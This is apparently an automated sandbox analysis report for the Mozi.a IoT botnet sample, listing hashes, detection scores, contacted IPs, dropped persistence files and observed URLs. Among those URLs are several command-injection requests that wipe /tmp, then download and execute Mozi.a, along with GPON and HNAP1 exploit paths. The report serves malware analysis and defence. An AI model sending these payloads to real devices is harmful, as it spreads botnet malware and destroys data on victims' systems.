
Mozi.a

Status: finished
Submission Time: 2020-06-03 00:57:44 +02:00
Malicious
Spreader
Trojan
Evader
Mirai

Details

  • Analysis ID: 235158
  • API (Web) ID: 366417
  • Analysis Started: 2020-06-03 00:57:44 +02:00
  • Analysis Finished: 2020-06-03 01:06:03 +02:00
  • MD5: 4dde761681684d7edad4e5e1ffdb940b
  • SHA1: 2327be693bc11a618c380d7d3abc2382d870d48b
  • SHA256: d546509ab6670f9ff31783ed72875dfc0f37fa2b666bd5870eecaaed2ebea4a8

Engine: Joe Sandbox
Detection: malicious
Score: 100
System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

Third Party Analysis Engines

  • malicious, Score: 38/60
  • malicious, Score: 16/40
  • malicious, Score: 17/31
  • malicious

IPs

IP Country Detection
193.100.82.45  Germany
34.24.160.243  United States
106.79.160.106  India
144.124.184.49  United Kingdom
58.111.71.158  Australia
80.109.176.200  Austria
186.9.248.77  Chile
207.249.235.151  Mexico
84.217.6.123  Sweden
200.70.51.210  Argentina
153.158.222.63  Japan
39.117.245.119  Korea Republic of
83.53.50.85  Spain
201.233.255.187  Colombia
186.84.127.120  Colombia
58.151.98.253  Korea Republic of
111.208.153.89  China
86.4.63.252  United Kingdom
69.199.21.101  United States
218.206.70.26  China
26.38.230.18  United States
76.65.11.32  Canada
80.176.157.140  United Kingdom
150.138.154.9  China
70.196.129.217  United States
136.232.54.49  India
166.220.143.247  United States
208.71.214.140  Malaysia
13.109.156.110  United States
171.194.232.240  United States
38.11.72.168  United States
177.5.160.75  Brazil
118.53.190.196  Korea Republic of
220.29.127.196  Japan
117.238.77.191  India
68.161.40.103  United States
206.62.162.78  United States
51.39.249.107  Saudi Arabia
69.158.127.129  Canada
212.60.167.132  Austria
31.99.25.188  United Kingdom
70.215.91.127  United States
88.183.19.183  France
152.191.30.10  United States
29.243.199.6  United States
119.48.128.127  China
60.67.56.218  Japan
117.174.245.141  China
115.249.32.11  India
213.35.235.171  Estonia
11.27.234.81  United States
18.251.179.98  United States
107.110.215.255  United States
81.42.80.31  Spain
2.170.12.195  Germany
51.76.3.248  United States
198.207.153.206  United States
37.145.99.181  Russian Federation
189.97.127.98  Brazil
19.20.211.89  United States
189.242.99.212  Mexico
44.207.112.199  United States
108.206.83.78  United States
136.130.232.228  United States
185.213.82.171  Germany
184.242.110.119  United States
95.22.184.190  Spain
84.236.115.102  Hungary
45.167.12.127  Mexico
86.58.252.62  Denmark
129.64.16.132  United States
135.107.145.122  United States
47.34.169.215  United States
101.32.133.174  China
36.216.98.253  China
100.213.26.164  United States
77.174.88.251  Netherlands
17.47.130.70  United States
177.30.49.164  Brazil
206.88.235.34  United States
165.177.228.160  United States
208.65.10.26  United States
156.150.249.100  Netherlands
42.20.47.71  Korea Republic of
168.30.131.51  United States
217.135.46.195  United Kingdom
44.155.225.143  United States
159.151.127.126  France
20.102.22.87  United States
134.84.177.187  United States
30.56.142.75  United States
162.91.214.4  United States
67.234.21.3  United States
175.192.19.159  Korea Republic of
195.86.224.78  Netherlands
179.83.63.36  Brazil
112.46.111.113  China
122.116.83.120  Taiwan; Republic of China (ROC)
34.57.62.23  United States
87.34.42.31  Ireland

URLs

Name Detection
http://127.0.0.1:80/GponForm/diag_Form?images/
http://66.110.242.43:80/HNAP1/
http://216.58.194.105:80/HNAP1/
http://13.49.85.164:80/HNAP1/
http://90.118.169.83:80/HNAP1/
http://211.7.233.66:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://52.196.143.166:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:5555/UD/act?1
http://12.226.183.120:80/HNAP1/
http://179.53.83.253:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:8080/GponForm/diag_Form?images/
http://104.95.107.71:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://91.216.121.70:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://www.alsa-project.org/alsa-info.sh
http://pastebin.ca)
http://156.225.79.1:80/HNAP1/
http://www.pastebin.ca.
http://118.89.21.16:49152/soap.cgi?service=WANIPConn1
http://www.alsa-project.org.
http://www.pastebin.ca
http://39.117.245.119:49152/soap.cgi?service=WANIPConn1
http://upx.sf.net
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://166.88.132.129:49152/soap.cgi?service=WANIPConn1
http://www.alsa-project.org/cardinfo-db/
http://www.pastebin.ca/upload.php
http://www.alsa-project.org

Dropped files

Name File Type Hashes Detection
/etc/init.d/mountdevsubfs.sh  ASCII text
/usr/networks  ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
/etc/rcS.d/S95baby.sh  POSIX shell script, ASCII text executable
/etc/rc.local  ASCII text
/etc/profile.d/vte-2.91.sh  ASCII text
/etc/profile.d/cedilla-portuguese.sh  ASCII text
/etc/profile.d/bash_completion.sh  ASCII text
/etc/profile.d/apps-bin-path.sh  ASCII text
/etc/profile.d/Z97-byobu.sh  ASCII text
/etc/init.d/umountnfs.sh  ASCII text
/etc/init.d/mountnfs.sh  ASCII text
/etc/init.d/mountnfs-bootclean.sh  ASCII text
/etc/init.d/mountkernfs.sh  ASCII text
/etc/init.d/mountall.sh  ASCII text
/etc/init.d/hwclock.sh  ASCII text
/etc/init.d/S95baby.sh  POSIX shell script, ASCII text executable
/etc/init.d/bootmisc.sh  ASCII text
/etc/init.d/checkfs.sh  ASCII text
/etc/init.d/checkroot-bootclean.sh  ASCII text
/etc/init.d/checkroot.sh  ASCII text
/etc/init.d/hostname.sh  ASCII text
/etc/init.d/mountall-bootclean.sh  ASCII text
/usr/share/doc/git/contrib/remotes2config.sh  ASCII text
/usr/share/doc/git/contrib/examples/git-revert.sh  ASCII text
/usr/share/doc/git/contrib/rerere-train.sh  ASCII text
/usr/share/doc/git/contrib/subtree/git-subtree.sh  ASCII text
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh  ASCII text
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh  ASCII text
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh  ASCII text
/usr/share/doc/git/contrib/git-resurrect.sh  ASCII text
/usr/share/doc/git/contrib/fast-import/git-import.sh  ASCII text
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh  ASCII text
/usr/share/doc/git/contrib/examples/git-whatchanged.sh  ASCII text
/usr/share/doc/git/contrib/examples/git-verify-tag.sh  ASCII text
/usr/share/doc/git/contrib/examples/git-tag.sh  ASCII text
/usr/share/doc/netcat-openbsd/examples/dist.sh  ASCII text
/usr/share/doc/git/contrib/examples/git-resolve.sh  ASCII text
/usr/share/doc/git/contrib/examples/git-reset.sh  ASCII text
/usr/share/doc/git/contrib/examples/git-repack.sh  ASCII text
/usr/share/doc/git/contrib/examples/git-pull.sh  ASCII text
/usr/share/doc/git/contrib/examples/git-notes.sh  ASCII text
/usr/share/doc/git/contrib/examples/git-merge.sh  ASCII text
/usr/share/doc/mdadm/examples/mdadd.sh  ASCII text
/usr/share/keyutils/request-key-debug.sh  ASCII text
/usr/share/hplip/hplip_clean.sh  ASCII text
/usr/share/doc/xdotool/examples/ffsp.sh  ASCII text
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh  ASCII text
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh  ASCII text
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh  ASCII text
/usr/share/doc/tmux/examples/bash_completion_tmux.sh  ASCII text
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh  ASCII text
/usr/share/doc/gdb/contrib/gdb-add-index.sh  ASCII text
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh  ASCII text
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh  ASCII text
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh  ASCII text
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh  ASCII text
/usr/share/doc/libsane/plustek/MakeModule.sh  ASCII text
/usr/share/doc/ifupdown/examples/ping-places.sh  ASCII text
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh  ASCII text
/usr/share/doc/ifupdown/examples/get-mac-address.sh  ASCII text
/usr/share/doc/ifupdown/examples/check-mac-address.sh  ASCII text
/etc/wpa_supplicant/ifupdown.sh  ASCII text
/usr/share/doc/acpid/examples/ac.sh  ASCII text
/usr/share/debconf/confmodule.sh  ASCII text
/usr/share/cups/braille/indexv4.sh  ASCII text
/usr/share/cups/braille/indexv3.sh  ASCII text
/usr/share/cups/braille/index.sh  ASCII text
/usr/share/cups/braille/cups-braille.sh  UTF-8 Unicode text
/usr/share/brltty/initramfs/brltty.sh  ASCII text
/usr/share/alsa/utils.sh  ASCII text
/usr/share/alsa-base/alsa-info.sh  ASCII text, with very long lines
/usr/share/doc/acpid/examples/default.sh  ASCII text
/etc/wpa_supplicant/functions.sh  ASCII text
/etc/wpa_supplicant/action_wpa.sh  ASCII text
/etc/libreoffice/soffice.sh  ASCII text
/etc/bash_completion.d/libreoffice.sh  ASCII text
/etc/acpi/undock.sh  ASCII text
/etc/acpi/tosh-wireless.sh  ASCII text
/etc/acpi/powerbtn.sh  ASCII text
/etc/acpi/ibm-wireless.sh  ASCII text
/etc/acpi/asus-wireless.sh  ASCII text
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh  ASCII text
/usr/share/doc/git/contrib/examples/git-ls-remote.sh  ASCII text
/usr/share/doc/git/contrib/examples/git-log.sh  ASCII text
/usr/share/doc/git/contrib/examples/git-gc.sh  ASCII text
/usr/share/doc/git/contrib/examples/git-fetch.sh  ASCII text
/usr/share/doc/git/contrib/examples/git-commit.sh  ASCII text
/usr/share/doc/git/contrib/examples/git-clone.sh  ASCII text
/usr/share/doc/git/contrib/examples/git-clean.sh  ASCII text
/usr/share/doc/git/contrib/examples/git-checkout.sh  ASCII text
/usr/share/doc/git/contrib/examples/git-am.sh  OS/2 REXX batch file, ASCII text
/usr/share/doc/git/contrib/examples/git-merge-ours.sh  ASCII text
/etc/acpi/asus-keyboard-backlight.sh  ASCII text
/usr/share/doc/gdb/contrib/expect-read1.sh  ASCII text
/usr/share/doc/gdb/contrib/ari/gdb_find.sh  ASCII text
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh  ASCII text
/usr/share/doc/gawk/examples/prog/igawk.sh  awk or perl script, ASCII text
/usr/share/doc/gawk/examples/network/PostAgent.sh  ASCII text
/usr/share/doc/cron/examples/cron-tasks-review.sh  ASCII text
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh  ASCII text